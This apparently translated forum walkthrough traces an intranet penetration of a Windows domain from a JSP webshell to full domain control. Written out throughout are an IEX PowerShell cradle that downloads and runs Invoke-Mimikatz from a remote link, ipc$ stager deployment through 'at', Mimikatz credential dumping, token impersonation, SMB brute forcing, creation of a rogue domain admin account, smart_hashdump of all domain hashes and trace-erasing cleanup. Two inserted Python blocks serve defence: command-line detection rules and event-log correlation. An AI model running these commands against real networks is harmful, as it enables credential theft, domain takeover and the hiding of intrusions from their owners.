Objective
Most of what is written about intranet penetration testing comes from the big names and tells us how to think, but for a small fry like me it has always stayed foggy.
So which tools actually let you move through an intranet unimpeded has always been what people want to know.
Today, in the spirit of all the teachers who share selflessly, I have taken the artifacts gathered over three years of "seeking a master, seeking a senior sister", sorted them out, and written up the key knowledge points.
The relevant knowledge points are summarized as follows:
- Generating a payload with Veil to evade antivirus
- Privilege escalation attempts with MSF under Meterpreter
- MSF bypassuac attempts under Meterpreter
- Correlating the information gathered during intranet penetration testing
- Adding Meterpreter routes and the scans that depend on them
- Using PowerShell under Meterpreter
- Using Meterpreter post modules
- Using an MSF custom-generated payload
- Process injection and token stealing
In fact, the focus is not on how many knowledge points there are; we only need to focus on the more important connecting points.
This is shared so that everyone on Safety Pulse can communicate, learn and progress together (and show off together).
First of all, the webshell was handed to me and is not the focus here, so I skip it.
The environment for the penetration test is as follows ("jump host" below means a machine used as a stepping stone):
- A: jump host (webshell machine), Windows Server 2012
- B: jump host, Windows (PowerShell scanning machine)
- C: jump host with a domain admin process, Windows Server 2012
- D: several other jump hosts
Step 1: Getting a Meterpreter callback
In fact, no penetration test goes as smoothly as we expect, and this time the beginning was no different.
I spent almost four hours on the whole test, and most of that time went into solving these problems.
1 The webshell cannot upload an exe
I originally planned to upload the Meterpreter payload directly and have it call back, but it turned out the upload was not possible. The alternative is the PowerShell Meterpreter module.
2 The Meterpreter reverse_tcp module did not call back
For the MSF payload callback I started with Meterpreter's reverse_tcp module. It would connect back, but a working Meterpreter session was never established,
so something must have been monitoring and catching our behaviour. On that basis I tried Meterpreter's reverse_https module instead, and the callback succeeded.
The problems encountered and the resolution process are shown in detail in the figures:
Figure 1-1 Using the payload
Figure 1-2 Setting up the HTTPS payload
Figure 1-3 Callback succeeded
Step 2: Trying privilege escalation on Windows Server 2012
What is the first thing that comes to mind when you get a low-privileged webshell? Privilege escalation, of course. I thought the same, so that is where the journey started.
First, searching MSF for MS15 gives some exploit modules. I tried ms15_05 and ms15_078; both ended in failure.
The details are shown in the figure:
Figure 2-1 The privilege escalation attempt failed
Step 3: Bypassuac test with the current account
I forgot to mention one thing at the start: the webshell itself is JSP, running as an ordinary domain user.
I also thought I might complete the escalation through bypassuac, but the result was as you can imagine: another failure.
The current situation is shown in the figures:
Figure 3-1 Current user rights
Figure 3-2 Bypassuac attempt
Step 4: Related information collection
Even though escalation did not succeed, we can still use the current user to do domain penetration testing.
The methods currently available to us for testing the domain are:
1 Collect information about the domain, including all users, all computers and the key groups.
The commonly used commands are:
net user /domain
net group "Domain Computers" /domain
net group "Domain Admins" /domain (shows the domain admins)
net localgroup Administrators
net view /domain
2 Collect information about SQL Server. If the current jump host runs SQL Server and the service user happens to be the current domain user, we can use sqlcmd for information gathering and for scanning attacks.
Only mentioned here; because of length it is not discussed in depth.
Based on my penetration testing experience I only did the simplest information gathering here: sqlcmd to list all the SQL Server machines, the current jump host's name, the current jump host's IP,
and net view for simple enumeration.
The details are shown in the figures:
Figure 4-1 Getting information with sqlcmd
Figure 4-2 The current machine name
Figure 4-3 Machine names from net view
Step 5: Information analysis, successfully obtaining a server
Once the information is collected we need to start thinking about what to do next.
First let's look at what we currently have:
- A: a domain user's process privileges on the current jump host (Windows Server 2012); escalation failed (and even if it had succeeded, we still could not get the user's plaintext password)
- B: the user name on the current jump host
- C: the names of the other machines with SQL Server installed, as returned by sqlcmd
At present our ideas are:
- 1 Use Meterpreter's current permissions to add a route and scan for weak passwords
- 2 Use PowerShell to scan the internal network (used in this test, but not at this point; more on it a little later; at this moment PowerShell is definitely the other artifact of intranet penetration testing)
- 3 Use the current user's permissions to set up socks4a, then use the information from step 1 to scan the intranet over socks
- 4 Use the current user's permissions to batch-test IPC$ or a dir of the other computers' C$ (that is, dir another computer's C$; success means we have permissions there)
After this analysis I chose the laziest method: compare the current jump host's name with the names from net view, pick the ones that look most similar, and test them manually.
This was also very fast: success on the second attempt.
The detailed procedure is:
net use \\ip\c$
tasklist /v /S ip
Figure 5-1 net use test succeeded
Figure 5-2 tasklist executed successfully
Step 6: Domain information collection
Step 4 already covered collecting domain information, so not much introduction here; this step builds on step 5. The knowledge points are:
1 Domain information collection, with the following commands:
net group "Domain Admins" /domain
net group /domain
net group "Domain Controllers" /domain
net group "Enterprise Admins" /domain
2 ipc$ intrusion; search Baidu for the classic ipc$ intrusion if you need the background
net use \\ip\c$
copy bat.bat \\ip\c$ (bat.bat is the PowerShell Meterpreter stager)
net time \\ip
at \\ip time c:\bat.bat
3 Upload the credential dumping tool 64.exe (the Mimikatz artifact, which everyone knows)
upload /home/64.exe c:\
shell
cd \
64.exe
4 View the details of the dumped user
net user xxx /domain
5 Use Meterpreter's ps to view the process list of the relevant user
6 Attempt domain token impersonation
use incognito
list_tokens -u
impersonate_token xxxxxx
In this penetration test I tried all of the knowledge points mentioned above; the details are in the figures:
Figure 6-1 Viewing the domain admins
Figure 6-2 Viewing the domain groups
Figure 6-3 Viewing the domain controllers
Figure 6-4 Viewing the Enterprise Admins group
Figure 6-5 Copying data to the share
Figure 6-6 Classic ipc$
Figure 6-7 Meterpreter callback succeeded
Figure 6-8 Uploading a file
Figure 6-9 Viewing server information
Figure 6-10 Dumping passwords
Figure 6-11 Viewing domain user rights
Figure 6-12 Viewing domain user rights
Figure 6-13 Token stealing attempt
Figure 6-14 Viewing the primary domain controller's IP
Step 7: Rapid expansion of control over SMB
What are you thinking as a reader at this moment? Having seen step 6, is it not time for bed, after all it is five o'clock in the morning?
But a professional seeker of masters, senior sisters and artifacts does not think so.
We have to make the final sprint, because the bell of dawn has rung.
Let's look at what permissions we currently have:
two jump hosts and two users' rights.
What we want to do now is very simple: expand control rapidly across the network. How? Also very simple: fast scanning completes our dream.
Specifically:
- 1 Use the two users we have acquired to scan quickly (scan where? see figure 6-14 at the end of step 6: the domain controller's IP segment)
- 2 smb_login scan
- 3 Port forwarding into the intranet
Now that we have the idea, the MSF artifact finally gets its moment. Let's play happily.
The detailed knowledge points are:
- 1 MSF routing: route add IP mask SessionID
- 2 The smb_login module, or psexec_scanner (you will need to search for this module)
- 3 Meterpreter port forwarding
- 4 The MSF socks4a module (not used in this test, which does not mean it is not good)
Figure 7-1 Setting the parameters for smb_login
Figure 7-2 Machines where the brute force succeeded
Figure 7-3 Viewing the permissions acquired
Figure 7-4 Port forwarding and the permissions currently held
Step 8: Using PowerShell to find the machines where a domain admin is logged on
Intranet penetration testing has two great artifacts, MSF and PowerShell, but people mostly use them separately, or rarely get to combine them during a test; today, reader, you are in luck.
First of all, PowerShell in intranet penetration testing can not only scan, brute-force and forward, it can of course do much more.
The following three modules are commonly used:
- 1 Empire is said to be an artifact, and it is indeed an artifact; I have not used it, so not much to say for now
- 2 PowerUp is said to be a privilege escalation artifact, and it is indeed an artifact; I seldom use it, so not much for now
- 3 PowerView is said to be a domain penetration artifact, and it is indeed an artifact; I use it all the time, very nice
Using PowerShell is actually very simple, but people generally do not pay much attention to it in practice.
There are three main ways to invoke it:
1 Download and execute in memory, as in the following: powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
2 Upload the PowerShell file to the jump host and execute it locally: powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1; Invoke-UserHunter}"
3 Upload it to the target and load it with Import-Module; using any PowerView module is then very simple, just call the function directly, as the following diagram shows.
If you can see the start of your PowerShell journey here, the intranet will start to become simple.
Figure 8-1 PowerView functions
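The three invocation methods above are exactly what a defender should be watching for in process creation logs. As an added example (not from the original write-up), here is a small Python rule set run over constructed command lines; the rules, the samples and the placeholder URL example.invalid are my assumptions, not anything taken from the test.

```python
import base64
import re

# Case-insensitive rules applied to the command line plus the decoded payload of any
# -EncodedCommand argument, so an encoded download cradle is caught like a plain one.
RULES = {
    "download_cradle": r"(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|WebClient)",
    "execution_policy_bypass": r"-(?:exec|ep|executionpolicy)\s+bypass",
    "known_offensive_module": r"Invoke-Mimikatz|Invoke-UserHunter|PowerView|PowerUp",
    "encoded_command": r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}",
}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(cmdline):
    """Return the sorted names of all rules the command line triggers."""
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    return sorted(name for name, pat in RULES.items()
                  if re.search(pat, text, re.IGNORECASE | re.DOTALL))


# Constructed sample command lines (not from the page's screenshots). The first two
# mirror invocation methods 1 and 2 above, with a placeholder URL instead of the real one.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16le")
).decode()
SAMPLES = {
    "cradle": "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x'); "
              "Invoke-Mimikatz -DumpCreds\"",
    "local_import": 'powershell.exe -exec bypass -Command "& {Import-Module .\\powerview.ps1; Invoke-UserHunter}"',
    "encoded": "powershell.exe -NoP -EncodedCommand " + ENCODED_PAYLOAD,
    "benign": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Logs | Measure-Object"',
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(f"{label:12s} -> {analyze(cmd) or ['clean']}")
```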
Enough talk; now the practical part, which really is very simple, simple enough to fix in one sentence.
Invoke-UserHunter in PowerView finds the machines where the current domain administrators are logged on.
We use it to take this journey a step further. Details in the figures:
Figure 8-1 Executing the PowerShell command
Figure 8-2 PowerView results
Step 9: Getting domain admin access (Windows 2012 permissions)
After step 8, reader, do you not feel there has been some harvest, and that intranet penetration testing is not so hopeless?
Artifact after artifact, and then we see it is Windows Server 2012: although a domain admin is logged on, our password-grabbing artifact is impotent there, and we cannot simply modify the registry and wait for the administrator to log in again.
Now look at the problem we have: through PowerShell we found a Windows Server 2012 machine where a domain admin is logged on, and we have permissions on that machine; from there we go after the domain controller.
The ideas are:
- 1 Modify the registry and wait for the domain admin to log in again, then grab the credentials (by then the day lilies will have gone cold)
- 2 Inject into a process through PowerUp to get domain permissions (not used; temporarily abandoned); of course you could also write a plugin-style process injection to get the permissions
- 3 MSF's token-stealing feature (this one is easy to implement)
With the idea clear, let's start the happy journey. Seek a master, seek a senior sister, seek an artifact, and professionally seek domain control:
1 Use the classic IPC intrusion again to call back Meterpreter, then:
getsystem
ps (view the process that the domain admin owns)
migrate PID (inject into that process)
2 Continue the classic ipc$ to the domain controller, in the Meterpreter shell:
net use \\<domain controller ip>\c$
net time \\<domain controller ip>
copy bat.bat \\<domain controller ip>\c$
at \\<domain controller ip> time c:\bat.bat (unexpected error, with a hint about schtasks.exe, which I was not familiar with) {Safety Pulse note: from Windows 2008 onwards the at command is deprecated; use schtasks scheduled tasks instead}
3 There is more than one path to success: add a domain admin account
net user demo demo /add /domain
net group "Domain Admins" demo /add /domain
At this point, we already have domain control permissions.
The details are in the figures:
Figure 9-1 Injecting into the domain admin's process and connecting to the domain controller
Figure 9-2 Adding a domain admin account
Figure 9-3 Checking whether the domain admin was added successfully
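From the defender's side, steps 1 to 3 above leave a distinctive trail in the Windows Security log. As an added example (not part of the original write-up), this Python correlator flags a new account dropped straight into Domain Admins (events 4720 then 4728) and admin share access followed by a scheduled task on the same host (5140 then 4698); the event ids are real, while the hosts, accounts and times are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample Security events (placeholder hosts, accounts and times, not real
# logs). Event ids are the real Windows ones: 5140 network share accessed, 4698 scheduled
# task created, 4720 user account created, 4728 member added to a global group.
EVENTS = [
    {"time": "2016-01-01T05:40:03", "id": 5140, "host": "SRV2", "subject": "CORP\\svc_web",
     "share": "\\\\*\\C$", "src_ip": "10.0.0.5"},
    {"time": "2016-01-01T05:40:09", "id": 4698, "host": "SRV2", "subject": "CORP\\svc_web",
     "task": "\\At1"},
    {"time": "2016-01-01T05:55:10", "id": 4720, "host": "DC1", "subject": "CORP\\svc_web",
     "target": "demo"},
    {"time": "2016-01-01T05:55:12", "id": 4728, "host": "DC1", "subject": "CORP\\svc_web",
     "member": "demo", "group": "Domain Admins"},
    {"time": "2016-01-02T09:00:00", "id": 4720, "host": "DC1", "subject": "CORP\\hr_admin",
     "target": "jsmith"},
    {"time": "2016-01-02T09:00:30", "id": 4728, "host": "DC1", "subject": "CORP\\hr_admin",
     "member": "jsmith", "group": "Domain Users"},
]


def _t(event):
    return datetime.fromisoformat(event["time"])


def detect_quick_domain_admin(events, window=timedelta(minutes=10)):
    """Accounts created (4720) and added to Domain Admins (4728) within `window`.
    Returns (member, creating account) tuples; a normal new hire is not flagged."""
    created = {e["target"]: _t(e) for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] != 4728 or e["group"].lower() != "domain admins":
            continue
        t0 = created.get(e["member"])
        if t0 is not None and timedelta(0) <= _t(e) - t0 <= window:
            hits.append((e["member"], e["subject"]))
    return hits


def detect_share_then_task(events, window=timedelta(minutes=5)):
    """Admin share (C$/ADMIN$) access followed by a scheduled task created on the same
    host by the same account within `window`. Returns (host, account, task) tuples."""
    shares = [e for e in events
              if e["id"] == 5140 and e["share"].upper().endswith(("\\C$", "\\ADMIN$"))]
    hits = []
    for t in events:
        if t["id"] != 4698:
            continue
        for s in shares:
            if (s["host"] == t["host"] and s["subject"] == t["subject"]
                    and timedelta(0) <= _t(t) - _t(s) <= window):
                hits.append((t["host"], t["subject"], t["task"]))
                break
    return hits


if __name__ == "__main__":
    print("new account straight into Domain Admins:", detect_quick_domain_admin(EVENTS))
    print("admin share access then scheduled task:", detect_share_then_task(EVENTS))
```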
Step 10: Domain controller, here I come (MSF psexec Meterpreter callback)
A glance at the clock: seven in the morning, the sun is about to rise. How do you feel at this moment? It's time for the morning run. The sun rises in the east, and domain control permissions have finally arrived.
First of all, there are many ways to log in to the domain controller; here are a few I know, and I believe you all know them too:
- 1 Port forwarding or SOCKS, then Remote Desktop to the domain controller
- 2 Log in to another computer on the intranet and use PsExec to get a shell
- 3 Use MSF's psexec to call back Meterpreter
We are using psexec to call back Meterpreter, which involves the following knowledge:
- 1 Using the psexec module in MSF
- 2 Using a custom payload with Meterpreter: when the default payload is inevitably caught by antivirus, use your own Veil-generated payload
The process is shown in the figures:
Figure 10-1 Running the psexec test
Figure 10-2 The default psexec callback did not succeed
Figure 10-3 Meterpreter's HTTPS module called back successfully
Figure 10-4 Domain controller system information
Step 11: Dumping all users' hashes with Meterpreter
With domain permissions, dumping the hashes is essential if we want deep control.
First the knowledge we need:
- 1 MSF has two usable modules: hashdump, which can only export local hashes (test it and see), and smart_hashdump, which can export the domain users' hashes
- 2 PowerShell has modules that export them directly; try them yourself
- 3 wce, mimikatz and other artifacts
Here I used MSF's smart_hashdump module. Note that to export hashes with this module you must have SYSTEM privileges.
The process is shown in the figure:
Figure 11-1 Using the smart_hashdump module
Step 12: The winding road of exploration
Here are some of the techniques used earlier, and some detours. The write-up is almost done.
A journey from webshell to domain control is complete; of course I took some detours along the way, which I point out here. Corrections are welcome, let's learn together.
Figure 12-1 Session overview
According to the figure above, I now control 5 sessions in total, four of which were needed: session 1, session 2, session 4 and session 5.
Session 1 came from the webshell callback, session 2 from the information analysis, session 4 from getting the domain admin, and session 5 is the domain controller.
Session 3 is the detour I took, a waste of time.
To complete a penetration test better, faster and more effectively, we usually have to practise the sword: try not to draw it at all, but when you draw it, draw blood.
Step 13: I came gently and I leave softly; goodbye, administrator (cleanup)
For a successful friendship test we have to leave without a shadow or a trace, so the finishing touches also happen quietly.
The relevant knowledge points are:
- 1 Delete the previously added domain admin account
- 2 Remove all tools used during the process
- 3 Delete all of your operation records
- 4 Close all Meterpreter sessions
In this process we uploaded two files, bat.bat and the 64-bit Mimikatz password grabbing tool;
both can simply be deleted.
Figure 13-1 Deleting the user
Figure 13-2 Closing the session
Summary
To sum up, something nice to say, or rather, shout the slogan first: "Seek a senior sister, seek a master, seek an artifact".
Thank you to the teachers who have silently shared with me for more than three years; thank you to the senior sister who quietly stayed by my side while I did this friendship test;
thank you to all the artifacts of these years, without whose support I would not have completed this friendship test.
As penetration testing enthusiasts we keep striving for that beautiful dream in our hearts;
as programmers we simply want to code. Life is so beautiful, why don't we join together and share what is good.
Contents
Domain Penetration Testing Tutorial (Windows Server 2012): A complete exploration path from Webshell to domain control
Objective
Step 1: Getting a Meterpreter callback
Step 2: Trying privilege escalation on Windows Server 2012
Step 3: Bypassuac test with the current account
Step 4: Related information collection
Step 5: Information analysis, successfully obtaining a server
Step 6: Domain information collection
Step 7: Rapid expansion of control over SMB
Step 8: Using PowerShell to find the machines where a domain admin is logged on
Step 9: Getting domain admin access (Windows 2012 permissions)
Step 10: Domain controller, here I come (MSF psexec Meterpreter callback)
Step 11: Dumping all users' hashes with Meterpreter
Step 12: The winding road of exploration
Step 13: I came gently and I leave softly; goodbye, administrator (cleanup)
Summary